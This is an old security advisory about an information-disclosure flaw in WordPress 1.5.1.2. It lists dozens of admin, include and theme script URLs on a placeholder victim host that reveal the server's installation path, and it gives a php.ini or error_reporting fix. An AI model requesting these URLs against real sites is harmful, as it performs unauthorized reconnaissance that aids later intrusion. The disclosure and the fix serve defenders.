11.16 21/06/2005 by rgod http://rgod.altervista.org rgod [at] autistici . org wordpress 1.5.1.2 “Strayhorn” contains a flaw that may lead to an unauthorized information disclosure. following urls reveal the installation path resulting in a loss of confidentiality. path disclosure urls: http://[victim]/wp-admin/admin-footer.php http://[victim]/wp-admin/admin-functions.php http://[victim]/wp-admin/edit-form.php http://[victim]/wp-admin/edit-form-advanced.php http://[victim]/wp-admin/edit-form-comment.php http://[victim]/wp-admin/edit-page-form.php http://[victim]/wp-includes/vars.php http://[victim]/wp-includes/locale.php http://[victim]/wp-content/plugins/hello.php http://[victim]/wp-content/plugins/textile1.php http://[victim]/wp-content/themes/default/page.php http://[victim]/wp-content/themes/default/archive.php http://[victim]/wp-content/themes/default/comments-popup.php http://[victim]/wp-content/themes/default/index.php http://[victim]/wp-content/themes/default/search.php http://[victim]/wp-content/themes/default/single.php http://[victim]/wp-content/themes/default/archives.php http://[victim]/wp-content/themes/default/footer.php http://[victim]/wp-content/themes/default/links.php http://[victim]/wp-content/themes/default/searchform.php * http://[victim]/wp-content/themes/default/404.php http://[victim]/wp-content/themes/default/header.php * http://[victim]/wp-content/themes/default/sidebar.php http://[victim]/wp-content/themes/classic/comments.php http://[victim]/wp-content/themes/classic/header.php http://[victim]/wp-content/themes/classic/comments-popup.php http://[victim]/wp-content/themes/classic/index.php http://[victim]/wp-content/themes/classic/footer.php http://[victim]/wp-admin/menu.php http://[victim]/wp-admin/menu-header.php http://[victim]/wp-admin/upgrade-functions.php http://[victim]/wp-includes/classes.php http://[victim]/wp-includes/default-filters.php http://[victim]/wp-includes/feed-functions.php solution: put this line: display_errors = off in php.ini config file in "Error handling and logging" section or add: error_reporting(0); at the begin of each script rgod